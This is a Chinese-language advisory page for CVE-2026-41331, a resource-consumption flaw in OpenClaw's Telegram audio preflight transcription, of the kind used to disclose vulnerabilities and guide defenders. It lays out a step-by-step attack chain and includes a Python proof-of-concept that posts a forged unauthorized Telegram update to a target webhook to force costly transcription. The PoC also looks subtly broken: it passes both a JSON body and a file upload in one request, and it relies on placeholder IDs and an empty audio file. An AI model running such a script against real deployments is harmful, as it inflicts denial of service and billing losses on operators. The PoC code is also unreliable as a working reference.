CVE-2026-41331 CVSS 5.3 中危

CVE-2026-41331 OpenClaw资源消耗漏洞

披露日期: 2026-04-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41331

漏洞类型

资源消耗

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.3.31之前版本存在资源消耗漏洞，位于Telegram音频预检转录功能中。由于白名单执行不充分，未授权的群组发送者可触发转录处理。攻击者能在授权检查应用前发起音频预检操作，导致资源或计费消耗。

技术细节

该漏洞源于OpenClaw在处理Telegram音频消息时的逻辑缺陷。系统在执行音频预检转录操作时，未能严格优先验证发送者的权限（白名单机制），而是直接启动了资源密集型的转录任务。虽然系统后续会执行授权检查，但在此时点，计费记录可能已生成或系统资源（如CPU和内存）已被大量占用。攻击者无需任何用户认证，仅需通过网络向受影响的OpenClaw实例发送特制的音频消息，即可持续触发该预检流程。这不仅可能导致服务器资源被耗尽，造成合法用户无法访问的拒绝服务状态，还会因频繁调用API而产生高额的不合理计费费用，属于典型的业务逻辑漏洞与经济型拒绝服务攻击。

攻击链分析

STEP 1

侦察

攻击者识别出正在使用OpenClaw服务的Telegram群组或Bot接口。

STEP 2

构造载荷

攻击者准备一段音频文件（可以是任意音频），并构造包含音频消息的Telegram API请求。

STEP 3

触发漏洞

攻击者以未授权发送者身份向目标OpenClaw实例发送音频消息。

STEP 4

资源消耗

OpenClaw在未验证权限的情况下启动音频预检转录，消耗服务器CPU/内存资源并产生计费。

STEP 5

达成影响

导致服务响应变慢或拒绝服务，同时造成受害者的经济损失。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
# Replace with the actual target endpoint
TARGET_URL = "https://target-openclaw-instance.com/api/telegram/webhook"
AUDIO_FILE = "test_audio.ogg"

def send_malicious_audio():
    """
    Simulates sending an unauthorized audio message to trigger
    the preflight transcription and consume resources.
    """
    headers = {
        "User-Agent": "Mozilla/5.0"
    }
    
    # Construct a payload that mimics a Telegram audio message
    # from an unauthorized sender
    payload = {
        "update_id": 123456789,
        "message": {
            "message_id": 1,
            "from": {
                "id": 999999999, 
                "is_bot": False, 
                "first_name": "Attacker"
            },
            "chat": {
                "id": -1001234567890, 
                "type": "group", 
                "title": "Target Group"
            },
            "voice": {
                "file_id": "AwADBAADbXXXXXXXX...", 
                "file_unique_id": "AgADbAAD...", 
                "duration": 30
            },
            "date": 1713634592
        }
    }

    try:
        with open(AUDIO_FILE, 'rb') as f:
            files = {'audio': f}
            response = requests.post(TARGET_URL, json=payload, headers=headers, files=files)
            
        if response.status_code == 200:
            print("[+] Request sent. Audio preflight likely triggered.")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    # Ensure you have a dummy audio file named 'test_audio.ogg' in the directory
    open(AUDIO_FILE, 'a').close() 
    send_malicious_audio()

影响范围

OpenClaw < 2026.3.31

防御指南

临时缓解措施

建议立即禁用Telegram音频自动转录功能，或在应用网关层部署严格的访问控制策略，阻断未授权来源发送的音频处理请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表